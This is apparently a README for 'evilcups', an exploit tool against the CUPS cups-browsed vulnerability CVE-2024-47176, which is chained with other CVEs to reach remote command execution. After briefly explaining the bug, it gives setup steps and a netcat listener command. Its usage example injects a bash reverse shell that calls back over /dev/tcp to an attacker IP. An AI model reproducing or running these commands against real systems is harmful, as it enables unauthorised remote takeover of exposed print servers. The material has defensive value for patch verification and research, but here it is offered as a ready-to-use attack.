CUPS (Common UNIX Printing System) is an open-source printing system that handles networked printers. CVE-2024-47176 specifically targets the cups-browsed functionality, which binds to INADDR_ANY:631, allowing it to trust any packet from any source. By manipulating the Get-Printer-Attributes IPP request, an attacker can send malicious print jobs from a remote system, leading to arbitrary command execution when combined with other vulnerabilities such as CVE-2024-47076 and CVE-2024-47175.

• Access to the target machine with port 631 (IPP) exposed to the internet.
• Python installed on your local machine (for running the exploit script).
• nmap installed for scanning the target.

1. Clone the repository:

   git clone https://github.com/<your-username>/evilcups.git
   cd evilcups

2. Install the required Python module:

   pip install ippserver

3. Ensure you have a listener ready to receive a reverse shell on your local machine. You can use nc for this:

   nc -lvnp <port>

Run the exploit script with the following syntax:

./evilcups.py <attacker_ip> <target_ip> "<command>"

./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"